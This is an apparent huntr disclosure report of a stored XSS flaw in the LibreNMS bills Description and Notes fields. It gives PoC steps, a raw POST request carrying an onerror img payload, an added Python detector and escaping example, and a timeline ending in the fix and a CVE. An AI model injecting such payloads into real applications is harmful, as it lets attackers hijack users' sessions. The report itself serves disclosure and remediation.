librenms bills Description & Notes Stored XSS in librenms/librenms

Valid

Reported on

Apr 12th 2022



Proof of Concept

  1. Log in.
  2. Go to http://[librenms]/bills
  3. Click "Create Bill".
  4. Add the payload to the Description or Notes field: ["<img src=x onerror=alert(1);>"]
POST /bills/ HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Uek0vZm92NEZkRFI5WVJBd281aVE9PSIsInZhbHVlIjoiRlZ6UEx5V3hlc1NqMlUxMkhCU0Vhb21vVHNWVXhBZnMzZkk1blRVZVEycllXTVNTTFdRVzN1akN5eEw4OVFNYXZvM2Mxd1NpeFl6MHk3UEhSSUxraTBUbWkxMkVHMXc3ZHpaaUtkMHVuQ1dWS203V3Vka3BlMWJBOEpmSGdJWGEiLCJtYWMiOiI2ZGRmYjEwNGRiNjBmNjgwNjBkYmFlNzBmYTM5MWY5OTBhM2FjN2ZjY2E1ZTdiZDQ0Y2ViMmVlMGMxYjBiOTA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZTNlBZc05YdTc5cUE5cTBObmFCb0E9PSIsInZhbHVlIjoiaklYUE94bGNRWC9oYll2VW9oVHhwZlh2aEdQR29rdk00dTdXN1JUUS9JMHNMZHYrRGJMVnVGT3FnOVBZQU04NW9peWl6amgzM0NVcDNFVVNCTC9rRlVIV0JlejRwRGh1bDl3K1lENHRDNFNRVlUxTElGMDVsbmlWS3pBeGo1WWQiLCJtYWMiOiIyZjY5N2IzNTFkODBmY2U1ZTRhODc5ZTMyOTI3ZDQ0NjdlMTVjYzEyMTlhZmQ2N2IzODlkMmVjMTQyZDFlNDBmIiwidGFnIjoiIn0%3D

_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&addbill=yes&device=-1&bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22&bill_type=cdr&bill_cdr=&bill_cdr_type=Mbps&dir_95th=in&bill_quota=&bill_quota_type=GB&bill_day=1&bill_custid=&bill_ref=&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22
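The request above carries the same payload in bill_name and bill_notes. As an added example (not code from the huntr report or from LibreNMS), the script below parses a constructed copy of that form body, flags the free-text bill fields that contain HTML markup, and shows the HTML entity encoding a view must apply before echoing a stored value; the field list and the redacted token are assumptions.

```python
"""Added example: detect markup in the bill form fields from the PoC body
and show the output encoding that neutralises it when rendered."""
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the PoC form body (CSRF token redacted).
POC_BODY = (
    "_token=REDACTED&addbill=yes&device=-1"
    "&bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22"
    "&bill_type=cdr&bill_cdr=&bill_cdr_type=Mbps&dir_95th=in"
    "&bill_quota=&bill_quota_type=GB&bill_day=1&bill_custid=&bill_ref="
    "&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22"
)

# Free-text bill fields that are later rendered in the bills UI (assumed list).
TEXT_FIELDS = ("bill_name", "bill_notes", "bill_ref", "bill_custid")

# A tag-like token, or an on* event-handler attribute assignment.
MARKUP_RE = re.compile(r"<\s*/?[a-z][^>]*>|\bon[a-z]+\s*=", re.IGNORECASE)


def flagged_fields(body: str) -> dict:
    """Return {field: decoded value} for text fields that contain HTML markup."""
    params = parse_qs(body, keep_blank_values=True)
    return {
        field: params[field][0]
        for field in TEXT_FIELDS
        if field in params and MARKUP_RE.search(params[field][0])
    }


def render_cell(value: str) -> str:
    """Encode a stored value for an HTML text node; the browser then shows
    the literal characters instead of creating an <img> element."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for field, value in flagged_fields(POC_BODY).items():
        print(f"{field}: stored value   = {value!r}")
        print(f"{field}: safe rendering = {render_cell(value)}")
```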

Impact

Stored XSS allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, the attacker might be able to gain full control over all of the application's functionality and data.

We are processing your report and will contact the librenms team within 24 hours. 8 months ago
dnr6419 modified the report 8 months ago
We have contacted a member of the librenms team and are waiting to hear back 8 months ago
We have sent a follow up to the librenms team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the librenms team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the librenms team. This report is now considered stale. 7 months ago
Tony Murray validated this vulnerability a month ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit 43cb72 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Tony Murray published this vulnerability 9 days ago